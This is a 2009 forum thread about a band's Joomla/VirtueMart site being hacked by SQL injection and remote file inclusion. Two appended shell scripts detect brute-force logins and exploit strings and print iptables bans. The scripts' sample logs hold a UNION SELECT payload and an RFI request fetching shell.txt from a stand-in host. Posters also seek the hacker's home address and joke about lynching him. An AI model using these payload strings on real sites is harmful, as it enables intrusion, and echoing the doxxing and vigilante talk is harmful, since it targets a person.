Hacked again

TexasBeth

Jan 26, 2009
Man. The nightmare site is hacked again. Totally FUCKED up. There are some pretty stiff penalties for this kind of stuff. I hope Lance takes 'em to task and they fry. That's some bullshit.

Walking the plank in shark infested waters somewhere in the Caribbean perhaps???!!!
 
Our guitarist Mike can totally lock down the site for you guys. He said that our site had hack attempts the moment it went up but he had some custom scripting that locked them out.
 
Anyone know how to find out more about someone's IP address? We have a hacker's IP, STATE, CITY and ZIP but would love his address ;) He tried to hack us today when we were putting the site back together (LOL)

If you are on a *nix environment, you can do a traceroute to the IP, which will give you all of the hops to that IP. The nearest ISP near that IP would be the place to direct your initial legal targeting. For the most part, though, a lot of these hackers use run-of-the-mill bots/worms to propagate their shit onto other people's servers. So, most likely, you'd find that the IP belongs to some other unknowing victim. The hacker bastards usually use those servers as relays for additional services or temporary warez sites, and the obnoxious/young hackers also like to screw with the people they encounter along the way (if they didn't mess with your site, they could continue parasitically abusing your server without anyone knowing). That's the route they'd take if they got in via some SSH brute-force login or telnet. I'd rule out form-injection exploits because they'd only be able to screw with your database or possibly execute some malicious code with the reduced permissions that webservers usually employ (no sane webserver would run as root).

You can probably check your processes (ps -awux) for any rampant perl processes or servers running that you might not be aware of. Or, you can check for a bot payload in /tmp or /var/tmp; they'll usually dump their stuff there in a zip, expand it, then run it. Also, try 'netstat -a' to get a list of physical network connections that are being made on various ports. You'll see the usual suspects (DNS, SMTP, web), but you might see other stuff indicating some sort of rebroadcasting or bot activity.

The super easy solution, though, given that you already have the offending IP address, is to block it with a software firewall. Your hosting provider may have a nice hardware solution in place, but if you have iptables or ipfw available, you can just keep blocking specific IPs using a tutorial like this...

http://www.e18.physik.tu-muenchen.de/~tnagel/ipt_recent/

Rather than going after them, having some sort of blacklist file/DB feeding a software firewall would be the cheapest way to stay on top of stuff like that. Being able to run 'ban IP' at the shell, or as a result of a script that monitors for brute-force attacks (like hundreds of login attempts from a single IP within a given time range), usually works for most stuff.

I really despise these little hacker piss-ants. It's so nice to be on the software engineering side of things rather than with those chaos-inducing jerks. The good thing is, once you find a system that works for you for NMF, you'll be able to employ it for all of your other stuff.

Happy Hunting!
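The "script that monitors for brute-force attacks" and feeds a 'ban IP' into the firewall, as an added example that is not the poster's script and not from the ipt_recent tutorial linked above. It assumes the standard OpenSSH "Failed password ... from IP" auth-log line and iptables; the threshold, the allowlist file and the sample log lines (including their IPs) are constructed for this example. The ban rules are printed rather than executed so they can be reviewed, piped to sh, or appended to a blacklist file.

```shell
#!/bin/sh
# Added example: count failed SSH logins per source IP and emit one iptables
# DROP rule per offender over a threshold. Not the forum poster's script; the
# log format is OpenSSH's, the sample log below is constructed.

# Print "COUNT IP" for every source IP with at least $2 failed logins in $1.
brute_force_ips() {
    logfile=$1
    threshold=${2:-100}   # "hundreds of attempts" in the post; assumed default
    awk -v thr="$threshold" '
        # OpenSSH: "... Failed password for [invalid user] NAME from IP port N ssh2"
        /Failed password for/ {
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
            if (ip != "") n[ip]++
        }
        END { for (ip in n) if (n[ip] >= thr) printf "%d %s\n", n[ip], ip }
    ' "$logfile" | sort -rn
}

# Reject anything that is not a plain IPv4 literal before it goes near a command line.
is_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# The rule itself; -I puts it at the top of INPUT so it wins over accept rules.
ban_rule() {
    printf 'iptables -I INPUT -s %s -j DROP\n' "$1"
}

# Emit a ban for each offender in log $1 over threshold $2, skipping IPs listed
# one per line in allowlist $3 (so an admin who fat-fingers a password is safe).
ban_rules_from_log() {
    brute_force_ips "$1" "$2" | while read -r count ip; do
        is_ipv4 "$ip" || continue
        grep -qxF "$ip" "$3" 2>/dev/null && continue
        ban_rule "$ip"
    done
}

# Constructed sample auth log: 120 failures from one IP, 2 from another, one
# legitimate key login. Written to a temp file whose path is printed.
make_sample_log() {
    f=$(mktemp)
    i=0
    while [ "$i" -lt 120 ]; do
        printf 'Jan 26 03:14:%02d web sshd[4242]: Failed password for root from 198.51.100.7 port %d ssh2\n' \
            "$((i % 60))" "$((51000 + i))"
        i=$((i + 1))
    done > "$f"
    cat >> "$f" <<'EOF'
Jan 26 03:15:01 web sshd[4243]: Failed password for invalid user admin from 203.0.113.9 port 40022 ssh2
Jan 26 03:15:02 web sshd[4243]: Failed password for invalid user admin from 203.0.113.9 port 40023 ssh2
Jan 26 03:15:09 web sshd[4250]: Accepted publickey for sherry from 192.0.2.44 port 50000 ssh2
EOF
    echo "$f"
}

# Stand-alone run: only 198.51.100.7 crosses the threshold of 100.
log=$(make_sample_log)
ban_rules_from_log "$log" 100 /dev/null
rm -f "$log"
```

Run it from cron against the tail of the real auth log (for example the last few minutes) to get the "within a given time range" behaviour; iptables rules added with -I are not persistent across reboots, so the blacklist file, not the live ruleset, should be the source of truth.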
 

Why am I picturing all of us going to this dude's house with torches and rope like in one of those old movies where the whole town goes on a lynching rampage?
I vote for the tar and feathering route...it's more of a slow and painful death.
 

Good thing this isn't emo-fest. We'd be serenading this guy, outside of his house, in the hopes that the sad tunes will make him want to open a vein.
 

THANKS FOR THE TIPS, we seem to have found a solution for the moment; don't want to go into too much detail, as you might imagine ;)
However I will certainly pass on your words to those helping !!
 
What was happening was, we were a victim of SQL injections and remote file inclusions. I had never even heard of these things until it happened to us several times.

Our Joomla install was the latest release, 1.5.9, and at the time our VirtueMart install was 1.1.2 (I am in the process of configuring 1.1.3). All of our modules were also the latest release, and I even created some custom Flash ones.....and of course I had all of the file permissions set correctly. So, it wasn't necessarily anything I was doing wrong.....but it was a matter of ignorance on my part because I didn't know as much about PHP as I should. This can truly happen to anybody....it's not a matter of if you get hacked, it's a matter of when.

I spent a good part of the day yesterday working with a developer who helped me to secure our site. We now have in place some script that will detect when someone is trying to add an exploit string and it immediately blocks their IP (and it lets them know it too....ha ha!!) and we also get a report that gives us their info. Unfortunately, as was mentioned above, hackers bounce their IPs, so catching this person is not going to be easy.....but it's not impossible.

So, here is what is going on with the site now. I have contacted our hosting company and they have completely reset our account with a fresh install. I have reinstalled Joomla 1.5.9 and VirtueMart 1.1.3. I have decided not to use our database backup, only because I am not sure if there was any hidden malicious content injected into it. So, I am very sorry to say that if you were registered, you will have to re-register because we no longer have your user info....better safe than sorry. I will have the site back up and running sometime tomorrow :)

Thank you everyone for your continued patience and understanding!!

~Sherry~
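What a "detect the exploit string, then block the IP" script can look like for the two attack classes named in the post, SQL injection and remote file inclusion, as an added example. It is not the script Sherry's developer wrote and not Joomla or VirtueMart code. It assumes the Apache combined access-log format; the signatures are a short heuristic list, not a complete one, and the sample log lines, their IPs and the com_foo component name are constructed for this example.

```shell
#!/bin/sh
# Added example: scan an Apache combined-format access log for SQL injection
# and remote file inclusion attempts and print one iptables DROP rule per
# source IP that sent one. Not the poster's script; sample data is constructed.

# Print "IP<TAB>CLASS<TAB>REQUEST-PATH" for each request matching a signature.
exploit_hits() {
    awk '
        # Decode %XX and + so an encoded payload matches the same patterns.
        function hex2dec(h,   i, v) {
            v = 0; h = tolower(h)
            for (i = 1; i <= length(h); i++)
                v = v * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
            return v
        }
        function urldecode(s,   out, c) {
            out = ""
            while (length(s) > 0) {
                c = substr(s, 1, 1)
                if (c == "%" && substr(s, 2, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                    out = out sprintf("%c", hex2dec(substr(s, 2, 2)))
                    s = substr(s, 4)
                } else {
                    out = out (c == "+" ? " " : c)
                    s = substr(s, 2)
                }
            }
            return out
        }
        {
            # Combined log: IP - - [time] "METHOD PATH PROTO" status bytes "ref" "ua"
            ip = $1
            split($0, q, "\"")           # q[2] is the quoted request line
            n = split(q[2], r, " ")      # r[2] is the path plus query string
            if (n < 2) next
            req = tolower(urldecode(r[2]))
            cls = ""
            # SQLi: a UNION SELECT or a probe of the schema tables
            if (req ~ /union[ \t]+(all[ \t]+)?select/ || req ~ /information_schema/)
                cls = "sqli"
            # RFI: any query parameter whose value is itself a remote URL
            else if (req ~ /[?&][^=&]+=(https?|ftp):\/\//)
                cls = "rfi"
            if (cls != "") printf "%s\t%s\t%s\n", ip, cls, r[2]
        }
    ' "$1"
}

# One ban per offending IP; printed, not executed, so it can be reviewed.
ban_rules_from_access_log() {
    exploit_hits "$1" | cut -f1 | sort -u | while read -r ip; do
        printf 'iptables -I INPUT -s %s -j DROP\n' "$ip"
    done
}

# Constructed sample access log: an encoded UNION SELECT, an RFI attempt that
# points a parameter at a remote shell.txt, a normal request, and a second
# SQLi probe with + for spaces. Written to a temp file whose path is printed.
make_sample_access_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.9 - - [26/Jan/2009:03:15:01 -0600] "GET /index.php?option=com_virtuemart&product_id=1%20UNION%20SELECT%201,2,3%20FROM%20jos_users HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Jan/2009:03:15:02 -0600] "GET /index.php?option=com_foo&path=http://203.0.113.55/shell.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.44 - - [26/Jan/2009:03:15:03 -0600] "GET /index.php?option=com_virtuemart&product_id=17 HTTP/1.1" 200 9031 "http://example.com/" "Mozilla/5.0"
203.0.113.9 - - [26/Jan/2009:03:15:04 -0600] "GET /index.php?id=1+and+1=2+union+select+1,table_name+from+information_schema.tables HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Stand-alone run: three hits from two IPs, two ban rules.
log=$(make_sample_access_log)
exploit_hits "$log"
ban_rules_from_access_log "$log"
rm -f "$log"
```

The RFI check only looks at the request path, so a remote URL in the Referer column does not trigger it, but a site that legitimately passes a full URL in a query parameter (a redirect-after-login parameter, say) would need that parameter excluded. Detection on the log is after the fact; it does not replace patching the component that accepted the string in the first place.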